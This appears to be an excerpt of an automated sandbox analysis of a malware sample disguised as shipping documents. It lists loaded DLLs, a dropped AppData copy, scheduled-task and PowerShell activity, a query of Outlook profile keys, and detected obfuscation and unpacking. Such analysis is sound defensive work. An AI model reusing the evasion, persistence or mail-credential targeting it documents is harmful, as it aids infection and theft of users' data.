Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: rShippingDocuments240384.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: rShippingDocuments240384.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: rShippingDocuments240384.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: dKuN.pdb source: rShippingDocuments240384.exe, tdcorV.exe.0.dr
Source: Binary string: dKuN.pdbSHA256 source: rShippingDocuments240384.exe, tdcorV.exe.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs .Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShippingDocuments240384.exe.7b70000.3.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs .Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs .Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs .Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs .Net Code: gDUfs8vBYH System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: rShippingDocuments240384.exe Static PE information: 0xC477B011 [Thu Jun 14 05:03:13 2074 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C18FE1 push es; retn 0007h 0_2_07C18FE2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1AEA8 push ds; retn 0007h 0_2_07C1B092
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C19290 push es; retn 0007h 0_2_07C19292
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1A248 push cs; retn 0007h 0_2_07C1A24A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1AA2B push ss; retn 0007h 0_2_07C1AA42
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1A150 push cs; retn 0007h 0_2_07C1A152
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C19168 push es; retn 0007h 0_2_07C1916A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1A931 push ss; retn 0007h 0_2_07C1A932
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C190F9 push es; retn 0007h 0_2_07C190FA
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1B097 push ds; retn 0007h 0_2_07C1B09A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31788 push ebx; retn 0007h 0_2_07C3178A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31717 push edx; retn 0007h 0_2_07C3171A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31671 push edx; retn 0007h 0_2_07C31672
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31561 push ecx; retn 0007h 0_2_07C31562
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31528 push ecx; retn 0007h 0_2_07C3152A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C314B8 push ecx; retn 0007h 0_2_07C314BA
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31431 push ecx; retn 0007h 0_2_07C31432
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31341 push eax; retn 0007h 0_2_07C31342
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C312C9 push eax; retn 0007h 0_2_07C312CA
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31D81 push edi; retn 0007h 0_2_07C31D82
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32D87 pushad ; retn 0007h 0_2_07C32D8A
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32DBF pushad ; retn 0007h 0_2_07C32DC2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32D31 pushad ; retn 0007h 0_2_07C32D32
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31CD1 push esi; retn 0007h 0_2_07C31CD2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32CF0 pushad ; retn 0007h 0_2_07C32CF2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31BE1 push esi; retn 0007h 0_2_07C31BE2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31B6F push ebp; retn 0007h 0_2_07C31B72
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31AC0 push ebp; retn 0007h 0_2_07C31AC2
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31A0F push esp; retn 0007h 0_2_07C31A12
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31910 push esp; retn 0007h 0_2_07C31912
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31889 push ebx; retn 0007h 0_2_07C3188A
Source: rShippingDocuments240384.exe Static PE information: section name: .text entropy: 7.715046701811915
Source: tdcorV.exe.0.dr Static PE information: section name: .text entropy: 7.715046701811915
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, nDX2exV4Efol9EyBrT.cs High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, Xo85XTr6pLMvtWIQEd.cs High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, CLaABd8aCvmPHd6ibU.cs High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, An5xPAAA94KcU6ST43T.cs High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, SAdgCYYLpYY10rKVJB.cs High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, UV8J1A13b0WyAveFQ9.cs High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, kSZLAABypvSS9HaSQd.cs High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, cF51482gRxgBjOXKev.cs High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, QjYghpfU82Ev6r9qkG.cs High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, F3OmGHEIhtxRXq52Jf.cs High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
